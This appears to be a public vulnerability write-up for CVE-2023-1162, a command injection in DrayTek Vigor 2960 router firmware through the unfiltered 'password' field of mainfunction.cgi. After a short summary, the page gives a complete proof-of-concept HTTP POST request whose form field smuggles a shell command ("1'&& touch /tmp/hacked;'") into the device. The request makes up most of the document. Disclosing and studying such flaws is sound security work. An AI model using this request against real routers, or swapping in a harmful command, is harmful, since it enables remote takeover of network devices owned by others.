Headline
CVE-2023-1162: Vuln/2.md at main · xxy1126/Vuln
A vulnerability, which was classified as critical, was found in DrayTek Vigor 2960 1.5.1.4. Affected is the function sub_1225C of the file mainfunction.cgi. The manipulation leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-222258 is the identifier assigned to this vulnerability.
This vulnerability is in function sub_1225C, file mainfunction.cgi. It does not filter var password, so we can achieve command injection.
POST /cgi-bin/mainfunction.cgi/trustcaupload HTTP/1.1
Host: xxxxx
Content-Length: 423
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: xxxxx
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBtX2IODkwu3BgXtR
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,
image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: xxxxx
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: lang=en; SESSION_ID_VIGOR=7:26EB81E4EA6DC603661320EBD1C938DC
Connection: close
------WebKitFormBoundaryBtX2IODkwu3BgXtR
Content-Disposition: form-data; name="selectfile"; filename="hack.pem"
Content-Type: application/x-compressed
hack
------WebKitFormBoundaryBtX2IODkwu3BgXtR
Content-Disposition: form-data; name="select"
11111
------WebKitFormBoundaryBtX2IODkwu3BgXtR
Content-Disposition: form-data; name="password"
1'&& touch /tmp/hacked;'
------WebKitFormBoundaryBtX2IODkwu3BgXtR--